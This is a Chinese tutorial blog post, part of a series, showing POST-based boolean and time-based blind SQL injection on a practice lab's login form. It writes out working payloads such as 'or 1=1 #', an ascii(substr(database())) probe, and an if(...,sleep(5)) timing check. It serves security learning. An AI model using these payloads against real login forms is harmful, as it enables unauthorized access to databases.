35岁重学网络安全——SQL注入篇(十九)

鲁迅先生曾经说过:做安全,先免责!

用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。

本文主要内容:盲注注入(POST型)

PS:POST型与GET型注入流程相同,只是提交方式不同。如果有不理解的地方,建议回看GET型注入。

POST型盲注

手工盲注原本就很麻烦,而且GET型与POST型基本上无差别,这里简单带过。如果不理解,建议回看GET型盲注的内容。

布尔盲注

使用靶场第15节
在这里插入图片描述

判断是否存在盲注

参数:uname=ad' or 1=1 #&passwd=admin&Submit=Submit
在这里插入图片描述

参数:uname=ad' or 1=2 #&passwd=admin&Submit=Submit
在这里插入图片描述

小结:or后条件为真时,页面正常登录,or后条件为假时,页面登录失败。存在真假值,因此可以使用布尔盲注。

判断数据库名称

这里只判断数据库名称的首字母,其余的判断,可以参照GET型布尔盲注内容进行测试。
参数:uname=ad' or ascii(substr((select database()),1,1)) = 115 #&passwd=admin&Submit=Submit
在这里插入图片描述

时间盲注

更多详细内容参考GET型时间盲注。使用靶场第15节

参数:uname=ad' or if(ascii(substr((select database()),1,1)) = 115,sleep(0),sleep(5)) #&passwd=admin&Submit=Submit
在这里插入图片描述

if的第一个参数条件为真,则执行sleep(0),页面立即加载,如果if第一个参数为假,则执行sleep(5),页面加载时间变长。

无情的广告时间

哈哈哈哈,又到了大家喜欢的广告时间了,公众号:编码魔坊,喜欢的话给个关注呗,点击下方小卡片,扫码即可关注,谢谢您的关注!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

道人禅(armey)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值